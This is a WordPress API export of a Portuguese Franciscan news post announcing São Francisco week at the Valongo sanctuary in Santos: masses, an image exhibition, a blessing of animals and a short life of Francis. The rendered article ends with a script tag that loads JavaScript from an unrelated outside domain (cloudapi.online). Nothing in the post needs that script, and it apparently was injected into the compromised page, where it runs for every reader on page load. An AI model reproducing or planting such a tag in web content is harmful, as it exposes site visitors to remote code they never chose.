{"id":46079,"date":"2013-10-01T11:26:29","date_gmt":"2013-10-01T14:26:29","guid":{"rendered":"http:\/\/new.franciscanos.org.br\/?p=46079"},"modified":"2019-04-25T11:19:29","modified_gmt":"2019-04-25T14:19:29","slug":"valongo-inicia-festividades-de-sao-francisco","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html","title":{"rendered":"Valongo inicia festividades de S\u00e3o Francisco de Assis"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2013\/09\/valongo_alto.jpg\" alt=\"valongo_alto\" width=\"820\" height=\"324\" \/><\/p>\n<p><em><strong>Exposi\u00e7\u00e3o de imagens, missas e b\u00ean\u00e7\u00e3o dos animais comp\u00f5em a programa\u00e7\u00e3o do Santu\u00e1rio<\/strong><\/em><\/p>\n<p><strong>Frei Roz\u00e2ntimo Antunes Costa\u00a0<\/strong><\/p>\n<p><strong>Santos (SP)<\/strong> &#8211; Com o tema geral \u201cS\u00e3o Francisco e o Papa Francisco, um jeito de viver a f\u00e9\u201d, o Santu\u00e1rio Santo Ant\u00f4nio do Valongo inicia, nesta ter\u00e7a-feira (1\u00ba), a programa\u00e7\u00e3o lit\u00fargica alusiva a S\u00e3o Francisco de Assis. As atividades acontecem at\u00e9 domingo (6), com destaque especial para sexta-feira \u2013 4 de outubro, quando a Igreja Cat\u00f3lica celebra o padroeiro dos animais.<\/p>\n<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2013\/09\/valongo3.jpg\"><img loading=\"lazy\" class=\"alignright size-full wp-image-46083\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2013\/09\/valongo3.jpg\" alt=\"valongo3\" width=\"400\" height=\"524\" \/><\/a>No primeiro dia, h\u00e1 missas \u00e0s 12, 15 e 19 horas, sob o tema \u201cPropagando a paz\u201d, al\u00e9m da abertura da exposi\u00e7\u00e3o de imagens de S\u00e3o Francisco no Sal\u00e3o Frei Galv\u00e3o durante as festividades. A exposi\u00e7\u00e3o estar\u00e1 aberta das 8 \u00e0s 18 horas. J\u00e1 na quarta-feira (2), a missa acontece \u00e0s 19 horas, com o tema \u201cVivendo a fraternidade\u201d. Na quinta-feira (3), \u00e0s 19 horas, a reflex\u00e3o ser\u00e1 o foco da celebra\u00e7\u00e3o, que ter\u00e1 o tema \u201cPreparando-se para o Encontro com a Irm\u00e3 Morte\u201d.<\/p>\n<p>O ponto alto da festa ser\u00e1 na sexta-feira (4), dia de S\u00e3o Francisco de Assis. Neste ano, haver\u00e1 b\u00ean\u00e7\u00e3o dos animais das 10 \u00e0s 12 horas e das 15 \u00e0s 17 horas, Ser\u00e1 realizada a VII Feira Ecol\u00f3gica de S\u00e3o Francisco \u201cCuidando das criaturas de Deus\u201d, que tamb\u00e9m ser\u00e1 o tema da missa, \u00e0s 19 horas.<\/p>\n<p>O encerramento da Semana Franciscana acontece no domingo (6), com missa \u00e0s 8 e 19 horas. As celebra\u00e7\u00f5es ser\u00e3o realizadas pelos sacerdotes do Santu\u00e1rio: Frei Andr\u00e9 Becker e Frei Roz\u00e2ntimo Antunes Costa.<br \/>\n<strong>Franciscanismo<\/strong> \u2013 No in\u00edcio do ano, quando o cardeal argentino Jorge Mario Bergoglio foi escolhido pelo Vaticano como o 266\u00ba papa da Igreja Cat\u00f3lica, ele escolheu o nome de Francisco como homenagem ao santo que fez op\u00e7\u00e3o pelos pobres.<br \/>\nUm dos santos mais populares do catolicismo, Francisco de Assis viveu na It\u00e1lia entre 1.182 e 1.226. At\u00e9 cerca dos seus 25 anos, Giovanni di Pietro do Bernardone (nome original de Francisco de Assis) teve uma vida burguesa e bo\u00eamia, como muitos jovens de sua \u00e9poca, at\u00e9 se sentir tocado pela voca\u00e7\u00e3o e se tornar frade. Revolucionou a Igreja ao resgatar seu sentido original, tendo o Evangelho como refer\u00eancia e fazendo a op\u00e7\u00e3o pr\u00e1tica pelos pobres, pelos leprosos (exclu\u00eddos naquele contexto) e pela natureza. \u00c9 fundador da Ordem dos Frades Menores e renovou a forma de viver o catolicismo.<br \/>\nO Santu\u00e1rio Santo Ant\u00f4nio do Valongo (Largo Marqu\u00eas de Monte Alegre, 13 \u2013 Valongo) \u00e9 um dos templos franciscanos mais tradicionais do Pa\u00eds, com 373 anos de hist\u00f3ria.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2013\/09\/valongo2.jpg\" alt=\"valongo2\" width=\"820\" height=\"461\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fraternidades<\/p>\n","protected":false},"author":1,"featured_media":203374,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[1249],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Fraternidades\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2013-10-01T14:26:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-04-25T14:19:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html\",\"name\":\"Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#primaryimage\"},\"datePublished\":\"2013-10-01T14:26:29+00:00\",\"dateModified\":\"2019-04-25T14:19:29+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Valongo inicia festividades de S\u00e3o Francisco de Assis\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html","og_locale":"pt_BR","og_type":"article","og_title":"Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos","og_description":"Fraternidades","og_url":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2013-10-01T14:26:29+00:00","article_modified_time":"2019-04-25T14:19:29+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2013\/10\/valongo_alto.jpg","width":273,"height":181},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html","name":"Valongo inicia festividades de S\u00e3o Francisco de Assis - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#primaryimage"},"datePublished":"2013-10-01T14:26:29+00:00","dateModified":"2019-04-25T14:19:29+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/valongo-inicia-festividades-de-sao-francisco.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Valongo inicia festividades de S\u00e3o Francisco de Assis"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/46079"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=46079"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/46079\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/203374"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=46079"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=46079"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=46079"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}